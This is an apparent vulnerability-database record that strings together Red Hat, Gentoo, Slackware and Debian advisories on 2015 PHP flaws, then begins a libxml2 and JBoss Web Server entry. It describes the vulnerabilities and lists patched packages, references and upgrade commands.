Red Hat Software Collections 2. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP\u0027s FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411,\nCVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2015-4604,\nCVE-2015-4605)\n\nAll php55-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):\n\nSource:\nphp55-php-5.5.21-4.el6.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el6.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el6.x86_64.rpm\nphp55-php-cli-5.5.21-4.el6.x86_64.rpm\nphp55-php-common-5.5.21-4.el6.x86_64.rpm\nphp55-php-dba-5.5.21-4.el6.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el6.x86_64.rpm\nphp55-php-devel-5.5.21-4.el6.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el6.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el6.x86_64.rpm\nphp55-php-gd-5.5.21-4.el6.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-imap-5.5.21-4.el6.x86_64.rpm\nphp55-php-intl-5.5.21-4.el6.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el6.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el6.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el6.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el6.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el6.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el6.x86_64.rpm\nphp55-php-process-5.5.21-4.el6.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el6.x86_64.rpm\nphp55-php-recode-5.5.21-4.el6.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-soap-5.5.21-4.el6.x86_64.rpm\nphp55-php-tidy-5.5.21-4.el6.x86_64.rpm\nphp55-php-xml-5.5.21-4.el6.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):\n\nSource:\nphp55-php-5.5.21-4.el6.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el6.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el6.x86_64.rpm\nphp55-php-cli-5.5.21-4.el6.x86_64.rpm\nphp55-php-common-5.5.21-4.el6.x86_64.rpm\nphp55-php-dba-5.5.21-4.el6.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el6.x86_64.rpm\nphp55-php-devel-5.5.21-4.el6.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el6.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el6.x86_64.rpm\nphp55-php-gd-5.5.21-4.el6.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-imap-5.5.21-4.el6.x86_64.rpm\nphp55-php-intl-5.5.21-4.el6.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el6.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el6.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el6.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el6.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el6.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el6.x86_64.rpm\nphp55-php-process-5.5.21-4.el6.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el6.x86_64.rpm\nphp55-php-recode-5.5.21-4.el6.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-soap-5.5.21-4.el6.x86_64.rpm\nphp55-php-tidy-5.5.21-4.el6.x86_64.rpm\nphp55-php-xml-5.5.21-4.el6.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):\n\nSource:\nphp55-php-5.5.21-4.el6.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el6.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el6.x86_64.rpm\nphp55-php-cli-5.5.21-4.el6.x86_64.rpm\nphp55-php-common-5.5.21-4.el6.x86_64.rpm\nphp55-php-dba-5.5.21-4.el6.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el6.x86_64.rpm\nphp55-php-devel-5.5.21-4.el6.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el6.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el6.x86_64.rpm\nphp55-php-gd-5.5.21-4.el6.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-imap-5.5.21-4.el6.x86_64.rpm\nphp55-php-intl-5.5.21-4.el6.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el6.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el6.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el6.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el6.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el6.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el6.x86_64.rpm\nphp55-php-process-5.5.21-4.el6.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el6.x86_64.rpm\nphp55-php-recode-5.5.21-4.el6.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-soap-5.5.21-4.el6.x86_64.rpm\nphp55-php-tidy-5.5.21-4.el6.x86_64.rpm\nphp55-php-xml-5.5.21-4.el6.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nphp55-php-5.5.21-4.el6.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el6.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el6.x86_64.rpm\nphp55-php-cli-5.5.21-4.el6.x86_64.rpm\nphp55-php-common-5.5.21-4.el6.x86_64.rpm\nphp55-php-dba-5.5.21-4.el6.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el6.x86_64.rpm\nphp55-php-devel-5.5.21-4.el6.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el6.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el6.x86_64.rpm\nphp55-php-gd-5.5.21-4.el6.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-imap-5.5.21-4.el6.x86_64.rpm\nphp55-php-intl-5.5.21-4.el6.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el6.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el6.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el6.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el6.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el6.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el6.x86_64.rpm\nphp55-php-process-5.5.21-4.el6.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el6.x86_64.rpm\nphp55-php-recode-5.5.21-4.el6.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el6.x86_64.rpm\nphp55-php-soap-5.5.21-4.el6.x86_64.rpm\nphp55-php-tidy-5.5.21-4.el6.x86_64.rpm\nphp55-php-xml-5.5.21-4.el6.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp55-php-5.5.21-4.el7.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el7.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el7.x86_64.rpm\nphp55-php-cli-5.5.21-4.el7.x86_64.rpm\nphp55-php-common-5.5.21-4.el7.x86_64.rpm\nphp55-php-dba-5.5.21-4.el7.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el7.x86_64.rpm\nphp55-php-devel-5.5.21-4.el7.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el7.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el7.x86_64.rpm\nphp55-php-gd-5.5.21-4.el7.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-intl-5.5.21-4.el7.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el7.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el7.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el7.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el7.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el7.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el7.x86_64.rpm\nphp55-php-process-5.5.21-4.el7.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el7.x86_64.rpm\nphp55-php-recode-5.5.21-4.el7.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-soap-5.5.21-4.el7.x86_64.rpm\nphp55-php-xml-5.5.21-4.el7.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nphp55-php-5.5.21-4.el7.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el7.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el7.x86_64.rpm\nphp55-php-cli-5.5.21-4.el7.x86_64.rpm\nphp55-php-common-5.5.21-4.el7.x86_64.rpm\nphp55-php-dba-5.5.21-4.el7.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el7.x86_64.rpm\nphp55-php-devel-5.5.21-4.el7.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el7.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el7.x86_64.rpm\nphp55-php-gd-5.5.21-4.el7.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-intl-5.5.21-4.el7.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el7.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el7.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el7.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el7.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el7.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el7.x86_64.rpm\nphp55-php-process-5.5.21-4.el7.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el7.x86_64.rpm\nphp55-php-recode-5.5.21-4.el7.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-soap-5.5.21-4.el7.x86_64.rpm\nphp55-php-xml-5.5.21-4.el7.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp55-php-5.5.21-4.el7.src.rpm\n\nx86_64:\nphp55-php-5.5.21-4.el7.x86_64.rpm\nphp55-php-bcmath-5.5.21-4.el7.x86_64.rpm\nphp55-php-cli-5.5.21-4.el7.x86_64.rpm\nphp55-php-common-5.5.21-4.el7.x86_64.rpm\nphp55-php-dba-5.5.21-4.el7.x86_64.rpm\nphp55-php-debuginfo-5.5.21-4.el7.x86_64.rpm\nphp55-php-devel-5.5.21-4.el7.x86_64.rpm\nphp55-php-enchant-5.5.21-4.el7.x86_64.rpm\nphp55-php-fpm-5.5.21-4.el7.x86_64.rpm\nphp55-php-gd-5.5.21-4.el7.x86_64.rpm\nphp55-php-gmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-intl-5.5.21-4.el7.x86_64.rpm\nphp55-php-ldap-5.5.21-4.el7.x86_64.rpm\nphp55-php-mbstring-5.5.21-4.el7.x86_64.rpm\nphp55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm\nphp55-php-odbc-5.5.21-4.el7.x86_64.rpm\nphp55-php-opcache-5.5.21-4.el7.x86_64.rpm\nphp55-php-pdo-5.5.21-4.el7.x86_64.rpm\nphp55-php-pgsql-5.5.21-4.el7.x86_64.rpm\nphp55-php-process-5.5.21-4.el7.x86_64.rpm\nphp55-php-pspell-5.5.21-4.el7.x86_64.rpm\nphp55-php-recode-5.5.21-4.el7.x86_64.rpm\nphp55-php-snmp-5.5.21-4.el7.x86_64.rpm\nphp55-php-soap-5.5.21-4.el7.x86_64.rpm\nphp55-php-xml-5.5.21-4.el7.x86_64.rpm\nphp55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVi8HYXlSAg2UNWIIRAiyPAJ99IZMPIkUJWe8WmApDpEGV6ff98wCgxBYL\nTtBX6SWqx78H/4bsQXtRlo4=\n=EuyB\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201606-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: PHP: Multiple vulnerabilities\n Date: June 19, 2016\n Bugs: #537586, #541098, #544186, #544330, #546872, #549538,\n #552408, #555576, #555830, #556952, #559612, #562882,\n #571254, #573892, #577376\n ID: 201606-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in PHP, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nBackground\n==========\n\nPHP is a widely-used general-purpose scripting language that is\nespecially suited for Web development and can be embedded into HTML. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as\nPHP 5.4 is now masked in Portage:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.6 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.6.19\"\n\nReferences\n==========\n\n[ 1 ] CVE-2013-6501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501\n[ 2 ] CVE-2014-9705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705\n[ 3 ] CVE-2014-9709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709\n[ 4 ] CVE-2015-0231\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231\n[ 5 ] CVE-2015-0273\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273\n[ 6 ] CVE-2015-1351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351\n[ 7 ] CVE-2015-1352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352\n[ 8 ] CVE-2015-2301\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301\n[ 9 ] CVE-2015-2348\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348\n[ 10 ] CVE-2015-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783\n[ 11 ] CVE-2015-2787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787\n[ 12 ] CVE-2015-3329\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329\n[ 13 ] CVE-2015-3330\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330\n[ 14 ] CVE-2015-4021\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021\n[ 15 ] CVE-2015-4022\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022\n[ 16 ] CVE-2015-4025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025\n[ 17 ] CVE-2015-4026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026\n[ 18 ] CVE-2015-4147\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147\n[ 19 ] CVE-2015-4148\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148\n[ 20 ] CVE-2015-4642\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642\n[ 21 ] CVE-2015-4643\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643\n[ 22 ] CVE-2015-4644\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644\n[ 23 ] CVE-2015-6831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831\n[ 24 ] CVE-2015-6832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832\n[ 25 ] CVE-2015-6833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833\n[ 26 ] CVE-2015-6834\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834\n[ 27 ] CVE-2015-6835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835\n[ 28 ] CVE-2015-6836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836\n[ 29 ] CVE-2015-6837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837\n[ 30 ] CVE-2015-6838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838\n[ 31 ] CVE-2015-7803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803\n[ 32 ] CVE-2015-7804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201606-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1. \n\nWe recommend that you upgrade your php5 packages",
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VAR-201512-0007
Vulnerability from variot - Updated: 2026-04-10 22:19Heap-based buffer overflow in the xmlGROW function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to obtain sensitive process memory information via unspecified vectors. Libxml2 is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application; denying service to legitimate users. Due to the nature of this issue, code-execution may be possible but this has not been confirmed. Libxml2 2.9.2 and prior are vulnerable. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for Red Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes documented linked to in the References. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942, CVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317)
-
A session fixation flaw was found in the way Tomcat recycled the requestedSessionSSL field. If at least one web application was configured to use the SSL session ID as the HTTP session ID, an attacker could reuse a previously used session ID for further requests. (CVE-2015-5346)
-
A CSRF flaw was found in Tomcat's the index pages for the Manager and Host Manager applications. These applications included a valid CSRF token when issuing a redirect as a result of an unauthenticated request to the root of the web application. This token could then be used by an attacker to perform a CSRF attack. (CVE-2015-5351)
-
It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)
-
A security manager bypass flaw was found in Tomcat that could allow remote, authenticated users to access arbitrary application data, potentially resulting in a denial of service. (CVE-2016-0763)
-
A use-after-free flaw was found in the way OpenSSL imported malformed Elliptic Curve private keys. (CVE-2015-0209)
-
